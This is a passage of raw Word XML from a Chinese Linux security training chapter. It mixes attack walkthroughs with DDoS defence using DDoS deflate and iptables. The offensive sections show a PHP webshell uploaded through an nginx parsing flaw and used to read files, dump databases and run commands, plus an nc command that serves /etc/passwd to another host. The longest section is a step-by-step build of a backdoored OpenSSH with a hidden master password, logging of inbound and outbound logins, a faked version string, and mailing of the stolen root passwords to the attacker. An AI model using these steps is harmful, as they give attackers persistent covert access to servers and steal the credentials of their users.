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28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>第二十四章  webshell使用方法-防止DDOS脚本、服务器被黑处理方法、使用strace跟踪进程系统调用过程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28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>本节所讲内容：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24.1  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>webshell使用方法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24.2  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>使用DDoS deflate 解决服务器被DDOS攻击的问题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24.3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暴力破解sshd服务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24.4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自动劫持root密码并转发密码到邮箱</w:t>
      </w:r>
    </w:p>
    <w:p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实验环境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服务端：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xuegod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63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.cn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 IP：192.168.1.63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客户端：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xuegod64.cn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 IP：192.168.1.64</w:t>
      </w:r>
    </w:p>
    <w:p/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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>本节所使用实验环境：RHEL 7 （如有使用RHEL 6，会特别注明）</w:t>
      </w:r>
    </w:p>
    <w:p/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24.1.1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攻击思路：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想要拿下一台主机A的权限：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   1、了解一下这个服务器：端口，服务器版本，操作系统版本。找漏洞。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2,  拿到对A有一定权限的身份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如果对方是一个WEB服务器，想办法上传webshell然后提权（利用对方的应用程序的漏洞）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3, 传上去后，得到apache身份，提权</w:t>
      </w:r>
    </w:p>
    <w:p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color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">24.1.2  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webshell使用方法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上传木马程序：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方法1：nginx解析漏洞。  把aa.php 改成 aa.jpg  ,通过网站中的上传图片功能上传到服务器。可以直接执行php程序。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详情：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CVE-2013-4547 Nginx解析漏洞深入利用及分析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：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>http://drops.wooyun.org/tips/2006</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p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方法2：把webshell通过base64编码加密后，注入数据库。使用时，解密后，再执行。</w:t>
      </w:r>
    </w:p>
    <w:p/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实验环境：还原到LNMP环境下。  上传webshell2.php到服务器上 ，执行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或：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.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使用rpm包，快速搭建LAMP环境：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color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[root@xuegod63 ~]# yum install -y httpd php php-mysql php-gd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> mariadb-server mariadb </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
    </w:p>
    <w:p/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cp webshell2.php  /server/nginx-1.2.8/html/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测试：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http://192.168.1.63/webshell2.php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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="2176780"/>
            <wp:effectExtent l="0" t="0" r="254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密码：xuegod</w:t>
      </w:r>
    </w:p>
    <w:p/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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="19469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46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登录以后能够看到web service的网站根目录的文件，也可以指定某个目录，但是需要该目录具体读的权限</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="200025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也可以下载这些文件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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="2725420"/>
            <wp:effectExtent l="0" t="0" r="698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2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打开MySQL管理器，可以登录到数据库，选项数据库，可以看到数据库中的数据</w:t>
      </w:r>
    </w:p>
    <w:p/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</w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2503805"/>
            <wp:effectExtent l="0" t="0" r="381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03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16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下载数据库中的表</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="16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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2568575"/>
            <wp:effectExtent l="0" t="0" r="381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6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执行数据库语句</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="16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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="2480945"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1460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80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执行一些简单的命令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或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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1957070"/>
            <wp:effectExtent l="0" t="0" r="4445" b="508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7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在/tmp目录下创建文件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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2092960"/>
            <wp:effectExtent l="0" t="0" r="5715" b="2540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9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回到主机中的/tmp目录查看刚刚所创建的文件，是以kill用户身份创建的，这里kill用户是php启动用户</w:t>
      </w:r>
    </w:p>
    <w:p/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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="2348230"/>
            <wp:effectExtent l="0" t="0" r="12065" b="1397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48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PHP变量相关，默认可以查看到PHP一些变量，类似于phpinfo，也可以在文本框中输入PHP变量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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="1935480"/>
            <wp:effectExtent l="0" t="0" r="5080" b="762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执行PHP代码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&lt;?php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   phpinfo();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?&gt;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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="1697355"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1714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97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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="2012315"/>
            <wp:effectExtent l="0" t="0" r="10795" b="698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1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输入PHP代码的执行结果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16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16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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="2205990"/>
            <wp:effectExtent l="0" t="0" r="6985" b="3810"/>
            <wp:docPr id="1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05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返回连接，相当一个客户去连接另外一台主机，指定IP，端口则可以开启连接其他主机</w:t>
      </w:r>
    </w:p>
    <w:p/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扩展nc命令：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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使用nc创建一个黑客监听服务器端口，随时客户端上传的数据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nc -l 9999 &lt; /etc/passwd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netstat -antup | grep 9999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tcp        0      0 0.0.0.0:9999                0.0.0.0:*                   LISTEN      55067/nc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登录xuegod64接收数据：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[root@xuegod64 ~]# nc 192.168.1.63 9999 &gt; a.txt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[root@xuegod64 ~]# vim a.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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注： 木马程序： server在被黑的机器上。  客户端在黑客的本地。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">24.2  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实战：使用DDoS deflate 解决服务器被DDOS攻击的问题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如何查是否受到DDOS攻击？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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24.2.1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脚本内容：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[root@xuegod63 html]#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vim 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ddos-test.sh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#写入以下内容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#!/bin/bash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netstat -ntu | awk '{print $5}' | cut -d: -f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4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| sort | uniq -c | sort -n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注释：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#!/bin/bash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netstat -ntu | awk '{print $5}' | cut -d: -f4             | sort |   uniq -c     | sort -n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5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5"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  截取外网IP和端口     截取外网的IP以：为分隔符  ｜排序 ｜ 排除相同的记录  ｜ 排序并统计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注：这个脚本在不同的机器上执行时，因为  print $5 取得的结果不一样，所以需要根据实际情况，改变cut -d: -f4 中fn的值。 如果-f4 不行，就使用f1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cut -d: -f1   //以冒号为分隔符，取第一列的值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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测试，模拟DDOS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="2633345"/>
            <wp:effectExtent l="0" t="0" r="3175" b="146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3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 ab -n 100 -c 10 http://192.168.1.63/index.html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[root@xuegod63 ~]# ./ddos-test.sh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  1 42.99.254.162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  1 Address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  1 servers)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  2 192.168.1.106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  2 192.168.1.23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102 192.168.1.63</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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24.2.2  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>防止DDOS：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方法一： 手动写iptables 规则，ip地址数比较少时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方法二: 检测到访问次数比较多的ip地址后，自动添加iptables规则。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如fail2ban或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linux+DDoS deflate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DDoS deflate介绍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fldChar w:fldCharType="begin"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instrText xml:space="preserve"> HYPERLINK "http://www.vpser.net/security/ddos-deflate.html" \t "_blank" </w:instrTex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fldChar w:fldCharType="separate"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DDoS deflate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fldChar w:fldCharType="end"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是一款免费的用来防御和减轻DDoS攻击的脚本。它通过netstat监测跟踪创建大量网络连接的IP地址，在检测到某个结点超过预设的限制时，该程序会通过APF或IPTABLES禁止或阻挡这些IP.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DDoS deflate官方网站：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fldChar w:fldCharType="begin"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instrText xml:space="preserve"> HYPERLINK "http://deflate.medialayer.com/" \t "_blank" </w:instrTex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fldChar w:fldCharType="separate"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http://deflate.medialayer.com/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fldChar w:fldCharType="end"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   被屏蔽，有可能打不开。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0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FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">24.2.3  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实战： 使用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DDoS deflate 解决服务器被DDOS攻击的问题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1、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>检测是否有DDOS攻击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执行：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netstat -ntu | awk '{print $5}' | cut -d: -f4 | sort | uniq -c | sort -n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如果发现某个IP连接数据上百的链接，说明就有DDOS攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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下面开始安装DDos deflate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、安装DDoS deflate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[root@xuegod63 ~]# wget http://www.inetbase.com/scripts/ddos/install.sh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下载DDoS  deflate，保证可以上网</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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chmod 700 install.sh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  //添加权限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./install.sh             //执行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Installing DOS-Deflate 0.6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Downloading source files.........done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Creating cron to run script every minute.....(Default setting).....done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Installation has completed.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Config file is at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/usr/local/ddos/ddos.conf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Please send in your comments and/or suggestions to zaf@vsnl.com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##############################################################################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##############################################################################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#                       "Artistic License"                                   #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#                                                                            #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#                           Preamble                                         #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#                                                                            #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# The intent of this document is to state the conditions under which a       #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# Package may be copied, such that the Copyright Holder maintains some       #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q 输入q 退出。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DDoS deflate的默认配置位于/usr/local/ddos/ddos.conf ，内容如下：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[root@xuegod63 ~]# vim /usr/local/ddos/ddos.conf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##### Paths of the script and other files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PROGDIR="/usr/local/ddos"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PROG=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"/usr/local/ddos/ddos.sh"  #要执行的DDOS脚本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IGNORE_IP_LIST="/usr/local/ddos/ignore.ip.list"  //IP地址白名单，注：在这个文件中IP不受控制。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CRON="/etc/cron.d/ddos.cron"    //定时执行程序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3、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查看定时任务：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[root@xuegod63 ~]# cat  /etc/cron.d/ddos.cron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SHELL=/bin/sh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0-59/1 * * * * root /usr/local/ddos/ddos.sh &gt;/dev/null 2&gt;&amp;1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24.2.4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实战： 如果1分钟内，一个IP地址对我们服务器访问150次以上，就认为发生DDOS，使用iptables把这个IP地址自动屏蔽掉。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vim /usr/local/ddos/ddos.conf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配置文件中的注释如下：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##### frequency in minutes for running the script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##### Caution: Every time this setting is changed, run the script with --cron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#####          option so that the new frequency takes effect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FREQ=1   //检查时间间隔，默认1分钟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##### How many connections define a bad IP? Indicate that below.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NO_OF_CONNECTIONS=150     //最大连接数，超过这个数IP就会被屏蔽，一般默认即可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##### APF_BAN=1 (Make sure your APF version is atleast 0.96)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##### APF_BAN=0 (Uses iptables for banning ips instead of APF)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APF_BAN=1        //使用APF还是iptables。推荐使用iptables,将APF_BAN的值改为0即可。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改：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19 APF_BAN=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1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为：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19 APF_BAN=0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##### KILL=0 (Bad IPs are'nt banned, good for interactive execution of script)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##### KILL=1 (Recommended setting)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KILL=1   //是否屏蔽IP，默认即可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##### An email is sent to the following address when an IP is banned.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##### Blank would suppress sending of mails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EMAIL_TO=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fldChar w:fldCharType="begin"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instrText xml:space="preserve"> HYPERLINK "mailto:jack@hackerfans.com" </w:instrTex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fldChar w:fldCharType="separate"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kill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@xuegod.com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fldChar w:fldCharType="end"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 //当IP被屏蔽时给指定邮箱发送邮件报警，换成自己的邮箱即可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##### Number of seconds the banned ip should remain in blacklist.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BAN_PERIOD=600    //禁用IP时间，默认600秒，可根据情况调整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用户可根据给默认配置文件加上的注释提示内容，修改配置文件。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注：安装后，不需要手动运行任何软件，因为有crontab计划任务，每过一分钟，会行自动执行一次。检查是否有不正常的访问量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需要重启ddos 服务？吗？  要：1   不要：2 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注：安装后，不需要手动运行任何软件，因为有crontab计划任务，每过一分钟，会行自动执行一次。检查是否有不正常的访问量</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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24.2.5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测试：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在xuegod64上模拟DDOS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4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~]#  ab -n 100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0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-c 10 http://192.168.1.63/index.html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等待一分钟后查看结果。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执行完后，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xudgod63查看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iptables -L-n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多了一条把xuegod64 DROP 的语句。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iptables -L -n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Chain INPUT (policy ACCEPT)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target     prot opt source               destination         </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="360" w:firstLineChars="200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DROP       all  --  192.168.1.64         0.0.0.0/0 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">24.2.6  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卸载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卸载软件的本质： 删除软件安装后的文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="360" w:firstLineChars="200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安装软件的本质：把你写的软件文件，复制对应的目录下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wget http://www.inetbase.com/scripts/ddos/uninstall.ddos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[root@xuegod63 ~]# chmod +x uninstall.ddos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./uninstall.ddos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0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注意：在卸载之前所被该程序拒绝访问的iptables的规则，不会自动清除</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0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ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="FF000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28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">24.3 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28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>暴力破解sshd服务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运行XP虚拟机上的暴力破解sshd服务软件进行演示暴力破解</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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防止暴力破解的方法： 安装fail2ban，请参考第二阶段。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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24.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实战：自动劫持root密码并转发密码到邮箱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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>本节所使用实验环境：RHEL 6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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1、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>自动劫持root密码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2、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>把存密码的文件转发到邮箱</w:t>
      </w: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root密码： 123456 </w:t>
      </w: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root密码： 123456   可以登录。    456789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一个用户名对应多个密码。 多出来的密码就是后门密码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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为什么要做：自动劫持root密码并转发密码到我的邮箱 ？？？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作用：当你的肉鸡密码被修改后，你可以收到管理员修改的密码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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24.4.1  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>劫持root密码的过程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="2979420"/>
            <wp:effectExtent l="0" t="0" r="0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1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、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ssh -v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tmp]# ssh -v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#查看安装前ssh版本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OpenSSH_5.3p1,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OpenSSL 1.0.0-fips 29 Mar 2010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2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、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gcc -v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tmp]# gcc -v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#确认安装gcc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。。。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gcc version 4.4.6 20110731 (Red Hat 4.4.6-3) (GCC)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3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、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安装gcc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tmp]# yum install gcc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#如果没安装gcc，就安装一下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4、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上传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0x06-openssh-5.9p1.patch.tar.gz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openssh-5.9p1.tar.gz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inotify-tools-3.13.tar.gz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到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/tmp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目录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5、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进入文件目录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cd /tmp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解压文件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tmp]# tar zxvf openssh-5.9p1.tar.gz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tmp]# tar -zxvf 0x06-openssh-5.9p1.patch.tar.gz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 xml:space="preserve">18.4.2 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安装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openssh-5.9p1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并打补丁：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[root@xuegod63 tmp]# cp openssh-5.9p1.patch/sshbd5.9p1.diff  openssh-5.9p1/ [root@xuegod63 openssh-5.9p1.patch]# cd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openssh-5.9p1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openssh-5.9p1]# patch &lt; sshbd5.9p1.diff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#打补就修改或者替换原来的文件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patching file auth.c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#认证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patching file auth-pam.c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#认证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patching file auth-passwd.c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#认证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patching file canohost.c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patching file includes.h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patching file log.c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patching file servconf.c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#关于sshd服务端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patching file sshconnect2.c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#关于sshd连接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patching file sshlogin.c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#关于登录，把root密码记录下来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patching file version.h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#关于版本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1、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修改后门密码和记录root密码的文件夹目录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openssh-5.9p1]# vim /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tmp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/openssh-5.9p1/includes.h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找到：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改：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#define ILOG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"/tmp/ilog"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//记录登录到本机的用户名和密码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#define OLOG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"/tmp/olog"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//记录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从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本机登录到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其他服务器上的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用户名和密码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#define SECRETPW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"apaajaboleh"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//你后门密码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为：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#define ILOG "/usr/share/ifile"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#define OLOG "/usr/share/ofile"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#define SECRETPW "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redhat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说明：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安装后的版本为：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ssh -v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OpenSSH_5.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>8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p1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Debian-1ubuntu3p1, OpenSSL 1.0.0-fips 29 Mar 2010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原来系统的版本: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[root@xuegod64 ~]# ssh -v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OpenSSH_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5.3p1,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OpenSSL 1.0.0-fips 29 Mar 2010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2、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为了使用安后的版本和原系统的版本一样，修改版本号：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openssh-5.9p1]# vim /root/openssh-5.9p1/version.h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改：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3 #define SSH_VERSION     "OpenSSH_5.8p1 Debian-1ubuntu3"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4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5 #define SSH_PORTABLE    "p1"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为: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#define SSH_VERSION     " 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OpenSSH_5.3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#define SSH_PORTABLE    "p1"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24.4.3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安装环境：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tmp]# yum install -y openssl openssl-devel pam-devel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zlib zlib-devel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开始安装：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openssh-5.9p1]# ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5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#查看编译环境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--prefix=/usr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#指定安装到/usr 目录下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--sysconfdir=/etc/ssh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#指定sshd服务配置文件目录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--with-pam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#支持pam认证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--with-kerberos5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#支持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kerberos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认证</w:t>
      </w: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24.4.4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编译并安装加了后门的sshd服务：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openssh-5.9p1]# make -j 4 &amp;&amp; make install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。。。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/usr/bin/install -c -m 0755 -s ssh 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/usr/bin/ssh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/usr/bin/install -c -m 0755 -s scp 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/usr/bin/scp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/usr/bin/install -c -m 0755 -s ssh-add /usr/bin/ssh-add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/usr/bin/install -c -m 0755 -s ssh-agent /usr/bin/ssh-agent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/usr/bin/install -c -m 0755 -s ssh-keygen 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/usr/bin/ssh-keygen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/usr/bin/install -c -m 0755 -s ssh-keyscan /usr/bin/ssh-keyscan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/usr/bin/install -c -m 0755 -s sshd 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/usr/sbin/sshd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/usr/bin/install -c -m 4711 -s ssh-keysign /usr/libexec/ssh-keysign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/usr/bin/install -c -m 0755 -s ssh-pkcs11-helper /usr/libexec/ssh-pkcs11-helper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/usr/bin/install -c -m 0755 -s sftp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 /usr/bin/sftp</w:t>
      </w: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扩展： 通过rpm -Vf 检查命令是否被替换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openssh-5.9p1]# rpm -Vf /usr/bin/scp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S.5....T.    /usr/bin/scp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S.5....T.    /usr/bin/sftp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S.5....T.    /usr/bin/ssh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S.5....T.    /usr/bin/ssh-add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SM5...GT.    /usr/bin/ssh-agent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S.5....T.    /usr/bin/ssh-keyscan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1、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重启sshd服务：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openssh-5.9p1]# service sshd restart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>2、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测试：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当用户再次远程登录后,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测试前，先查看一下：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/usr/share/ifile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#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记录登录到本机的用户名和密码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是否存在。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ls /usr/share/ifile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ls: cannot access /usr/share/ifile: No such file or directory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3、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使用xshell登录：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</w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="2539365"/>
            <wp:effectExtent l="0" t="0" r="0" b="133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4、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>再次查看：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[root@xuegod63 ~]# cat /usr/share/ifile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user:password --&gt; root:123456</w:t>
      </w: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5、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测试，修改root密码：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[root@xuegod63 ~]# passwd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Changing password for user root.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New password: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23456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BAD PASSWORD: it is too short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BAD PASSWORD: is too simple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Retype new password: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23456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passwd: all authentication tokens updated successfully.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ssh root@192.168.1.63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[root@xuegod63 ~]# cat /tmp/olog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user:password@host --&gt; root:23456@192.168.1.63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6、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另外我们也可以使用后门密码来登录root帐号：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openssh-5.9p1]# ssh root@192.168.1.63  输入密码：mkinge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查看：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[root@xuegod63 tmp]# cat /tmp/olog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user:password@host --&gt; root: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mkinge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@192.168.1.63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user:password@host --&gt; root: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mkinge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@192.168.1.63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 xml:space="preserve">24.4.5 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测试：记录远程主机的密码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>1、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使用xuegod63登录远程主机xuegod64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ssh root@192.168.1.64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root@192.168.1.64's password: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123456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Last login: Wed Aug 12 19:29:28 2015 from 192.168.1.63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xuegod64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~]#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[root@xuegod63 ~]# cat /tmp/olog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#查看记录从xuegod64登录到远程主机的密码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user:password@host --&gt; root:12345678@192.168.1.63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user:password@host --&gt; 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root:123456@192.168.1.64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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>2、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自动发送邮件：这里以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>163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的smtp服务器为例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方法1： 通过sendmail或postfix给自己发邮件。 缺点： 需要开服务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方法2：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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "http://blog.csdn.net/sohu_2011/article/details/42065733" </w:instrTex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fldChar w:fldCharType="separate"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LINUX下通过外部SMTP发邮件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你就像在Linux安装一个foxmail。foxmail  能发邮件，收邮件？  smtp.163.com   pop3.163.com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vim /etc/mail.rc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#在此文件中间，随机找个位置插入以下内容：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set from=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>helloworld14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@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163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.com smtp=smtp.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163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.com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set smtp-auth-user=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>helloworld14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smtp-auth-password=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PASSWORD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smtp-auth=login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注：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set from=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>helloworld14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@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163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.com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#指定发件人的邮箱，这里我们就写成和收件人的邮箱一样。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set smtp-auth-user=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>helloworld14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#写自己发件人的邮箱帐号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smtp-auth-password=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PASSWORD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#写自己发件人的邮箱密码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配置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163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邮箱，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开启pop3/smtp服务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登录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>163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邮箱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网站：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mail.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163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.com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点：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设置-&gt;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POP3/SMTP/IMAP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-&gt;开启pop3服务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勾选开启pop3服务后，smtp也会自动开启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</w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3495040" cy="4628515"/>
            <wp:effectExtent l="0" t="0" r="10160" b="63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462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</w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5057140" cy="3094990"/>
            <wp:effectExtent l="0" t="0" r="10160" b="1016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309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点击开启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POP3/SMTP/IMAP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服务</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="2684780"/>
            <wp:effectExtent l="0" t="0" r="9525" b="127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8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勾选POP3/SMTP服务，随后弹出提醒相关信息，点击确定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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2681605"/>
            <wp:effectExtent l="0" t="0" r="10160" b="444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8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勾选开启，随后需要设置客户端授权，需要手机以短信形式获取验证码，获取验证后，输入验证码并点击确定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</w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="2750185"/>
